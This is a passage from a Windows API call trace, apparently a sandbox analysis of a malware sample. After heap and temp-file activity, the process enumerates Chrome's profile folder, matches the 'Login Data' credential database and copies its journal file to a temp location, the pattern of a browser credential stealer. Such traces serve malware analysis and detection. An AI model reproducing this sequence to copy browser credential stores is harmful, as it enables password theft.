returned 0x3fc [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c328) returned 0x3fc [0162.800] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c328 | out: hHeap=0x2dc0000) returned 1 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c240) returned 0xe0 [0162.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c240 | out: hHeap=0x2dc0000) returned 1 [0162.801] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def58 | out: lpOverlapped=0x2def58) returned 1 [0162.801] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def4c | out: lpOverlapped=0x2def4c) returned 1 [0162.801] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2def5c | out: lpOverlapped=0x2def5c) returned 1 [0162.801] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6a7, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0162.801] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x394c240 [0162.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c240) returned 0x6c [0162.801] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6a7, cbMultiByte=-1, lpWideCharStr=0x394c240, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-journal") returned 54 [0162.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2def5c | out: lpFileInformation=0x2def5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.801] GetLastError () returned 0x2 [0162.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c240) returned 0x6c [0162.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c240 | out: hHeap=0x2dc0000) returned 1 [0162.801] ReadFile (in: hFile=0x160, lpBuffer=0x2defd8, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2defac, lpOverlapped=0x2def8c | out: lpBuffer=0x2defd8*, lpNumberOfBytesRead=0x2defac*=0x10, lpOverlapped=0x2def8c) returned 1 [0162.802] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6dd, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0162.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b9a8 [0162.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b9a8) returned 0x64 [0162.802] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6dd, cbMultiByte=-1, lpWideCharStr=0x395b9a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-wal") returned 50 [0162.802] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2def6c | out: lpFileInformation=0x2def6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.802] GetLastError () returned 0x2 [0162.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b9a8) returned 0x64 [0162.802] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b9a8 | out: hHeap=0x2dc0000) returned 1 [0162.802] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2def98 | out: lpFileSizeHigh=0x2def98*=0x0) returned 0x4800 [0162.802] ReadFile (in: hFile=0x160, lpBuffer=0x39663f0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2def84, lpOverlapped=0x2def64 | out: lpBuffer=0x39663f0*, lpNumberOfBytesRead=0x2def84*=0x800, lpOverlapped=0x2def64) returned 1 [0162.802] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2def38 | out: lpOverlapped=0x2def38) returned 1 [0162.808] CloseHandle (hObject=0x160) returned 1 [0162.808] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x800 [0162.808] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x800 [0162.808] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392bf70 | out: hHeap=0x2dc0000) returned 1 [0162.808] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0xac80 [0162.808] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395c8b0 | out: hHeap=0x2dc0000) returned 1 [0162.808] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392c778) returned 0x400 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392c778 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0e8) returned 0x74 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a0e8 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x281 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a490 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a990) returned 0x10 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a990 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0x10 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a930 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a948) returned 0x10 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a948 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0x10 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a900 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8a0) returned 0x10 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8a0 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b938) returned 0x65 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b938 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0x81 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fd0 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9d0) returned 0x16 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9d0 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9f0) returned 0x17 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9f0 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba10) returned 0x18 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba10 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba30) returned 0x14 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba30 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x80 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a480) returned 0x6 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a480 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0x50 [0162.809] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929dd0 | out: hHeap=0x2dc0000) returned 1 [0162.809] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x66 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.810] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b918) returned 0x92 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b918 | out: hHeap=0x2dc0000) returned 1 [0162.810] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x13 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b90 | out: hHeap=0x2dc0000) returned 1 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a060 | out: hHeap=0x2dc0000) returned 1 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c80 | out: hHeap=0x2dc0000) returned 1 [0162.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a088 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca0 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929cc0 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ce0 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d00 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a400 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8d0 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a420 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a440 | out: hHeap=0x2dc0000) returned 1 [0162.835] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a460 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8e8 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e28 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d20 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d40 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d60 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d80 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929da0 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e48 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a750 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a3a8 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a330 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a828 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a308 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a280 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39298b0 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a228 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a810 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7e0 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7b0 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0162.836] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a780 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929828 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7f8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a960 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a918 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8b8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a168 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c00 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bc8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a978 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9a8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9c0 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9d8 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9f0 | out: hHeap=0x2dc0000) returned 1 [0162.837] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba50 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a060 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392aa08 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a720 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b40 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929af0 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929aa0 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a1c8 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392cb80 | out: hHeap=0x2dc0000) returned 1 [0162.839] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39298c0 | out: hHeap=0x2dc0000) returned 1 [0162.839] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp")) returned 1 [0162.840] VirtualQuery (in: lpAddress=0x925608, lpBuffer=0x2df2cc, dwLength=0x1c | out: lpBuffer=0x2df2cc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.840] GetProcessHeap () returned 0x8e0000 [0162.840] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925608 | out: hHeap=0x8e0000) returned 1 [0162.840] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.840] GetProcessHeap () returned 0x8e0000 [0162.840] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.840] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data-journal", cAlternateFileName="LOGIND~2")) returned 1 [0162.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.841] lstrlenW (lpString="\\") returned 1 [0162.841] GetProcessHeap () returned 0x8e0000 [0162.841] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.841] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.841] lstrlenW (lpString="Login Data-journal") returned 18 [0162.841] GetProcessHeap () returned 0x8e0000 [0162.841] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbe) returned 0x925550 [0162.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.841] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Login Data-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" [0162.841] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.841] GetProcessHeap () returned 0x8e0000 [0162.841] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.841] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal", lpSrch="Login Data") returned="Login Data-journal" [0162.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 94 [0162.841] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925550, Length=0xbc) returned 0xea6c97db [0162.841] GetProcessHeap () returned 0x8e0000 [0162.841] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8) returned 0x8fbfe8 [0162.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0162.841] CloseHandle (hObject=0x160) returned 1 [0162.842] GetProcessHeap () returned 0x8e0000 [0162.842] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x925618 [0162.842] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x925618 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0162.842] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925618 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp")) returned 0x6ebb [0162.842] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp")) returned 1 [0162.842] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp"), bFailIfExists=0) returned 1 [0162.843] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x394b848 [0162.843] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x394b878 [0162.843] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39297d0 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x394b938 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x39299b0 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a870 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929a00 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a858 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929a50 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a88 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929ac0 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929b20 [0162.844] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a350 [0162.844] MultiByteToWideChar (in: 